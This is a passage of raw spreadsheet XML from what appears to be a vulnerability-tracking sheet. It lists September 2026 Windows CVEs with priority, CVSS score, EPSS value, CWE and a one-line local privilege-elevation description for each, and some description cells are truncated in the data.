t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t></is></c></row><row r="927"><c r="A927" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B927" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C927" s="5" t="inlineStr"><is><t>CVE-2026-69413</t></is></c><c r="D927" s="5" t="n"><v>7</v></c><c r="E927" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F927" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G927" s="5" t="inlineStr" /><c r="H927" s="5" t="n"><v>0.003</v></c><c r="I927" s="5" t="inlineStr" /><c r="J927" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K92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27" s="5" t="inlineStr" /><c r="M927" s="5" t="inlineStr" /><c r="N927" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O927" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P927" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q927" s="5" t="inlineStr" /><c r="R927" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S927" s="5" t="inlineStr"><is><t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T927" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t></is></c></row><row r="928"><c r="A928" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B928" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C928" s="5" t="inlineStr"><is><t>CVE-2026-69422</t></is></c><c r="D928" s="5" t="n"><v>7</v></c><c r="E928" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F928" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G928" s="5" t="inlineStr" /><c r="H928" s="5" t="n"><v>0.003</v></c><c r="I928" s="5" t="inlineStr" /><c r="J928" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K928" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L928" s="5" t="inlineStr" /><c r="M928" s="5" t="inlineStr" /><c r="N928" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O928" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P928" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q928" s="5" t="inlineStr" /><c r="R928" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S928" s="5" t="inlineStr"><is><t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T928" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t></is></c></row><row r="929"><c r="A929" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B929" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C929" s="5" t="inlineStr"><is><t>CVE-2026-69430</t></is></c><c r="D929" s="5" t="n"><v>7</v></c><c r="E929" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F929" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G929" s="5" t="inlineStr" /><c r="H929" s="5" t="n"><v>0.003</v></c><c r="I929" s="5" t="inlineStr" /><c r="J929" s="5" t="inlineStr" /><c r="K929" s="5" t="inlineStr" /><c r="L929" s="5" t="inlineStr" /><c r="M929" s="5" t="inlineStr" /><c r="N929" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O929" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P929" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q929" s="5" t="inlineStr" /><c r="R929" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S929" s="5" t="inlineStr"><is><t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T929" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t></is></c></row><row r="930"><c r="A930" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B930" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C930" s="5" t="inlineStr"><is><t>CVE-2026-69440</t></is></c><c r="D930" s="5" t="n"><v>7</v></c><c r="E930" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F930" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G930" s="5" t="inlineStr" /><c r="H930" s="5" t="n"><v>0.002</v></c><c r="I930" s="5" t="inlineStr" /><c r="J930" s="5" t="inlineStr" /><c r="K930" s="5" t="inlineStr" /><c r="L930" s="5" t="inlineStr" /><c r="M930" s="5" t="inlineStr" /><c r="N930" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O930" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P930" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q930" s="5" t="inlineStr" /><c r="R930" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S930" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T930" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t></is></c></row><row r="931"><c r="A931" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B931" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C931" s="5" t="inlineStr"><is><t>CVE-2026-69441</t></is></c><c r="D931" s="5" t="n"><v>7</v></c><c r="E931" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F931" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G931" s="5" t="inlineStr" /><c r="H931" s="5" t="n"><v>0.002</v></c><c r="I931" s="5" t="inlineStr" /><c r="J931" s="5" t="inlineStr" /><c r="K931" s="5" t="inlineStr" /><c r="L931" s="5" t="inlineStr" /><c r="M931" s="5" t="inlineStr" /><c r="N931" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O931" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P931" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q931" s="5" t="inlineStr" /><c r="R931" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S931" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T931" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t></is></c></row><row r="932"><c r="A932" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B932" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C932" s="5" t="inlineStr"><is><t>CVE-2026-69448</t></is></c><c r="D932" s="5" t="n"><v>7</v></c><c r="E932" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F932" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G932" s="5" t="inlineStr" /><c r="H932" s="5" t="n"><v>0.002</v></c><c r="I932" s="5" t="inlineStr" /><c r="J932" s="5" t="inlineStr" /><c r="K932" s="5" t="inlineStr" /><c r="L932" s="5" t="inlineStr" /><c r="M932" s="5" t="inlineStr" /><c r="N932" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O932" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P932" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q932" s="5" t="inlineStr" /><c r="R932" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S932" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T932" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t></is></c></row><row r="933"><c r="A933" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B933" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C933" s="5" t="inlineStr"><is><t>CVE-2026-69466</t></is></c><c r="D933" s="5" t="n"><v>7</v></c><c r="E933" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F933" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G933" s="5" t="inlineStr" /><c r="H933" s="5" t="n"><v>0.002</v></c><c r="I933" s="5" t="inlineStr" /><c r="J933" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K93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33" s="5" t="inlineStr" /><c r="M933" s="5" t="inlineStr" /><c r="N933" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O933" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P933" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q933" s="5" t="inlineStr" /><c r="R933" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S933" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T933" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t></is></c></row><row r="934"><c r="A934" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B934" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C934" s="5" t="inlineStr"><is><t>CVE-2026-69468</t></is></c><c r="D934" s="5" t="n"><v>7</v></c><c r="E934" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F934" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G934" s="5" t="inlineStr" /><c r="H934" s="5" t="n"><v>0.003</v></c><c r="I934" s="5" t="inlineStr" /><c r="J934" s="5" t="inlineStr" /><c r="K934" s="5" t="inlineStr" /><c r="L934" s="5" t="inlineStr" /><c r="M934" s="5" t="inlineStr" /><c r="N934" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O934" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P934" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q934" s="5" t="inlineStr" /><c r="R934" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S934" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T934" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t></is></c></row><row r="935"><c r="A935" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B935" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C935" s="5" t="inlineStr"><is><t>CVE-2026-69470</t></is></c><c r="D935" s="5" t="n"><v>7</v></c><c r="E935" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F935" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G935" s="5" t="inlineStr" /><c r="H935" s="5" t="n"><v>0.003</v></c><c r="I935" s="5" t="inlineStr" /><c r="J935" s="5" t="inlineStr" /><c r="K935" s="5" t="inlineStr" /><c r="L935" s="5" t="inlineStr" /><c r="M935" s="5" t="inlineStr" /><c r="N935" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O935" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P935" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q935" s="5" t="inlineStr" /><c r="R935" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S935" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T935" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t></is></c></row><row r="936"><c r="A936" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B936" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C936" s="5" t="inlineStr"><is><t>CVE-2026-69472</t></is></c><c r="D936" s="5" t="n"><v>7</v></c><c r="E936" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F936" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G936" s="5" t="inlineStr" /><c r="H936" s="5" t="n"><v>0.003</v></c><c r="I936" s="5" t="inlineStr" /><c r="J936" s="5" t="inlineStr" /><c r="K936" s="5" t="inlineStr" /><c r="L936" s="5" t="inlineStr" /><c r="M936" s="5" t="inlineStr" /><c r="N936" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O936" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P936" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q936" s="5" t="inlineStr" /><c r="R936" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S936" s="5" t="inlineStr"><is><t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T936" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t></is></c></row><row r="937"><c r="A937" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B937" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C937" s="5" t="inlineStr"><is><t>CVE-2026-69473</t></is></c><c r="D937" s="5" t="n"><v>7</v></c><c r="E937" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F937" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G937" s="5" t="inlineStr" /><c r="H937" s="5" t="n"><v>0.003</v></c><c r="I937" s="5" t="inlineStr" /><c r="J937" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K93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37" s="5" t="inlineStr" /><c r="M937" s="5" t="inlineStr" /><c r="N937" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O937" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P937" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q937" s="5" t="inlineStr" /><c r="R937" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S937" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T937" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t></is></c></row><row r="938"><c r="A938" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B938" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C938" s="5" t="inlineStr"><is><t>CVE-2026-69488</t></is></c><c r="D938" s="5" t="n"><v>7</v></c><c r="E938" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F938" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G938" s="5" t="inlineStr" /><c r="H938" s="5" t="n"><v>0.003</v></c><c r="I938" s="5" t="inlineStr" /><c r="J938" s="5" t="inlineStr" /><c r="K938" s="5" t="inlineStr" /><c r="L938" s="5" t="inlineStr" /><c r="M938" s="5" t="inlineStr" /><c r="N938" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O938" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P938" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q938" s="5" t="inlineStr" /><c r="R938" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S938" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T938" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t></is></c></row><row r="939"><c r="A939" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B939" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C939" s="5" t="inlineStr"><is><t>CVE-2026-69492</t></is></c><c r="D939" s="5" t="n"><v>7</v></c><c r="E939" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F939" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G939" s="5" t="inlineStr" /><c r="H939" s="5" t="n"><v>0.003</v></c><c r="I939" s="5" t="inlineStr" /><c r="J939" s="5" t="inlineStr" /><c r="K939" s="5" t="inlineStr" /><c r="L939" s="5" t="inlineStr" /><c r="M939" s="5" t="inlineStr" /><c r="N939" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O939" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P939" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q939" s="5" t="inlineStr" /><c r="R939" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S939" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T939" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t></is></c></row><row r="940"><c r="A940" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B940" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C940" s="5" t="inlineStr"><is><t>CVE-2026-69498</t></is></c><c r="D940" s="5" t="n"><v>7</v></c><c r="E940" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F940" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G940" s="5" t="inlineStr" /><c r="H940" s="5" t="n"><v>0.003</v></c><c r="I940" s="5" t="inlineStr" /><c r="J940" s="5" t="inlineStr" /><c r="K940" s="5" t="inlineStr" /><c r="L940" s="5" t="inlineStr" /><c r="M940" s="5" t="inlineStr" /><c r="N940" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O940" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P940" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q940" s="5" t="inlineStr" /><c r="R940" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S940" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T940" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t></is></c></row><row r="941"><c r="A941" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B941" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C941" s="5" t="inlineStr"><is><t>CVE-2026-69500</t></is></c><c r="D941" s="5" t="n"><v>7</v></c><c r="E941" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F941" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G941" s="5" t="inlineStr" /><c r="H941" s="5" t="n"><v>0.003</v></c><c r="I941" s="5" t="inlineStr" /><c r="J941" s="5" t="inlineStr" /><c r="K941" s="5" t="inlineStr" /><c r="L941" s="5" t="inlineStr" /><c r="M941" s="5" t="inlineStr" /><c r="N941" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O941" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P941" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q941" s="5" t="inlineStr" /><c r="R941" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S941" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T941" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t></is></c></row><row r="942"><c r="A942" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B942" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C942" s="5" t="inlineStr"><is><t>CVE-2026-69501</t></is></c><c r="D942" s="5" t="n"><v>7</v></c><c r="E942" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F942" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G942" s="5" t="inlineStr" /><c r="H942" s="5" t="n"><v>0.002</v></c><c r="I942" s="5" t="inlineStr" /><c r="J942" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K942" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L942" s="5" t="inlineStr" /><c r="M942" s="5" t="inlineStr" /><c r="N942" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O942" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P942" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q942" s="5" t="inlineStr" /><c r="R942" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S942" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T942" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t></is></c></row><row r="943"><c r="A943" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B943" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C943" s="5" t="inlineStr"><is><t>CVE-2026-69516</t></is></c><c r="D943" s="5" t="n"><v>7</v></c><c r="E943" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F943" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G943" s="5" t="inlineStr" /><c r="H943" s="5" t="n"><v>0.002</v></c><c r="I943" s="5" t="inlineStr" /><c r="J943" s="5" t="inlineStr" /><c r="K943" s="5" t="inlineStr" /><c r="L943" s="5" t="inlineStr" /><c r="M943" s="5" t="inlineStr" /><c r="N943" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O943" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P943" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q943" s="5" t="inlineStr" /><c r="R943" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S943" s="5" t="inlineStr"><is><t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T943" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t></is></c></row><row r="944"><c r="A944" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B944" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C944" s="5" t="inlineStr"><is><t>CVE-2026-69517</t></is></c><c r="D944" s="5" t="n"><v>7</v></c><c r="E944" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F944" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G944" s="5" t="inlineStr" /><c r="H944" s="5" t="n"><v>0.003</v></c><c r="I944" s="5" t="inlineStr" /><c r="J944" s="5" t="inlineStr" /><c r="K944" s="5" t="inlineStr" /><c r="L944" s="5" t="inlineStr" /><c r="M944" s="5" t="inlineStr" /><c r="N944" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O944" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P944" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q944" s="5" t="inlineStr" /><c r="R944" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S944" s="5" t="inlineStr"><is><t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T944" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t></is></c></row><row r="945"><c r="A945" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B945" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C945" s="5" t="inlineStr"><is><t>CVE-2026-69540</t></is></c><c r="D945" s="5" t="n"><v>7</v></c><c r="E945" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F945" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G945" s="5" t="inlineStr" /><c r="H945" s="5" t="n"><v>0.003</v></c><c r="I945" s="5" t="inlineStr" /><c r="J945" s="5" t="inlineStr" /><c r="K945" s="5" t="inlineStr" /><c r="L945" s="5" t="inlineStr" /><c r="M945" s="5" t="inlineStr" /><c r="N945" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O945" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P945" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q945" s="5" t="inlineStr" /><c r="R945" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S945" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T945" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t></is></c></row><row r="946"><c r="A946" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B946" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C946" s="5" t="inlineStr"><is><t>CVE-2026-69549</t></is></c><c r="D946" s="5" t="n"><v>7</v></c><c r="E946" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F946" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G946" s="5" t="inlineStr" /><c r="H946" s="5" t="n"><v>0.003</v></c><c r="I946" s="5" t="inlineStr" /><c r="J946" s="5" t="inlineStr" /><c r="K946" s="5" t="inlineStr" /><c r="L946" s="5" t="inlineStr" /><c r="M946" s="5" t="inlineStr" /><c r="N946" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O946" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P946" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q946" s="5" t="inlineStr" /><c r="R946" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="S946" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T946" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t></is></c></row><row r="947"><c r="A947" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B947" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C947" s="5" t="inlineStr"><is><t>CVE-2026-69560</t></is></c><c r="D947" s="5" t="n"><v>7</v></c><c r="E947" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F947" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G947" s="5" t="inlineStr" /><c r="H947" s="5" t="n"><v>0.003</v></c><c r="I947" s="5" t="inlineStr" /><c r="J947" s="5" t="inlineStr" /><c r="K947" s="5" t="inlineStr" /><c r="L947" s="5" t="inlineStr" /><c r="M947" s="5" t="inlineStr" /><c r="N947" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O947" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P947" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q947" s="5" t="inlineStr" /><c r="R947" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S947" s="5" t="inlineStr"><is><t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T947" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t></is></c></row><row r="948"><c r="A948" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B948" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C948" s="5" t="inlineStr"><is><t>CVE-2026-69563</t></is></c><c r="D948" s="5" t="n"><v>7</v></c><c r="E948" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F948" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G948" s="5" t="inlineStr" /><c r="H948" s="5" t="n"><v>0.002</v></c><c r="I948" s="5" t="inlineStr" /><c r="J948" s="5" t="inlineStr" /><c r="K948" s="5" t="inlineStr" /><c r="L948" s="5" t="inlineStr" /><c r="M948" s="5" t="inlineStr" /><c r="N948" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O948" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P948" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q948" s="5" t="inlineStr" /><c r="R948" s="5" t="inlineStr"><is><t>CWE-122, CWE-367</t></is></c><c r="S948" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T948" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t></is></c></row><row r="949"><c r="A949" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B949" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C949" s="5" t="inlineStr"><is><t>CVE-2026-69564</t></is></c><c r="D949" s="5" t="n"><v>7</v></c><c r="E949" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F949" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G949" s="5" t="inlineStr" /><c r="H949" s="5" t="n"><v>0.003</v></c><c r="I949" s="5" t="inlineStr" /><c r="J949" s="5" t="inlineStr" /><c r="K949" s="5" t="inlineStr" /><c r="L949" s="5" t="inlineStr" /><c r="M949" s="5" t="inlineStr" /><c r="N949" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O949" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P949" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q949" s="5" t="inlineStr" /><c r="R949" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S949" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to 